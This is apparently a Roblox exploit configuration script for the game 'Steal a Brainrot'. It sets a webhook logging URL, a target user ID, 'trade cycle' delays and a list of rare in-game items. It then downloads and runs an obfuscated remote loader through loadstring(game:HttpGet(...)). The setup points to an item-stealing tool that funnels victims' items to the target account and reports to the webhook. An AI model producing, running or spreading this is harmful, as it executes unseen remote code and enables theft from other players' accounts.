getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_e5c68a242b6144ebba16a289005b7740"
getgenv().TARGET_ID = 2813571178
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Dragon Cannelloni"] = true,
    ["Garama and Madundung"] = true,
    ["Chillin Chili"] = true,
    ["Chipso and Queso"] = true,
    ["W or L"] = true,
    ["Swaggy Bros"] = true,
    ["La Taco Combinasion"] = true,
    ["Festive 67"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Money Money Puggy"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Swag Soda"] = true,
    ["Los Bros"] = true,
    ["Los Primos"] = true,
    ["La Casa Boo"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Las Sis"] = true,
    ["Orcaledon"] = true,
    ["Eviledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Money Money Reindeer"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Rosetti Tualetti"] = true,
    ["La Ginger Sekolah"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Tuff Toucan"] = true,
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["La Secret Combinasion"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
